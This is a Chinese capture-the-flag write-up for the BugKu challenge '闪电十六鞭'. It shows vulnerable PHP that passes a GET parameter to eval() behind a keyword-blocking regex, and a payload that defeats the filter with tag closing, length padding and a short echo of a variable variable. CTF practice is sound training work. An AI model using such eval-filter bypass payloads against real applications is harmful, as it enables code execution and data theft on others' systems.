BugKu_闪电十六鞭

在这里插入图片描述
访问目标地址

在这里插入图片描述
发现了一段php代码,又是代码审计的问题

分析代码

<?php
    error_reporting(0);
    require __DIR__.'/flag.php';

    $exam = 'return\''.sha1(time()).'\';';

    if (!isset($_GET['flag'])) {
        echo '<a href="./?flag='.$exam.'">Click here</a>';
    }
    else if (strlen($_GET['flag']) != strlen($exam)) {
        echo '长度不允许';
    }
    else if (preg_match('/`|"|\.|\\\\|\(|\)|\[|\]|_|flag|echo|print|require|include|die|exit/is', $_GET['flag'])) {
        echo '关键字不允许';
    }
    else if (eval($_GET['flag']) === sha1($flag)) {
        echo $flag;
    }
    else {
        echo '马老师发生甚么事了';
    }

    echo '<hr>';

    highlight_file(__FILE__);
flag变量长度等于$exam的长度,长度为49

flag变量不能包含` ,, . , \ , ( , ) , [ , ] , _ , flag , echo , print , require , include , die , exit ;

eval($_GET[‘flag’]) === sha1($flag)
其中第三点等于sha1可以利用短标签绕过判断,直接利用eval输出$flag变量的值,构造payload绕过对flag字符串的过滤,payload为?flag=$a='blag';$a{0}='f';?>11111111111111111;<?=$$a;?>,得到flag{78062956} ;其中?>用于闭合开头的<?php 标记,111111是用来填充长度的,
其中<?=$var?><?php echo $var; ?>的效果是一样的,用于输出某个变量

在这里插入图片描述
成功得到flag!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值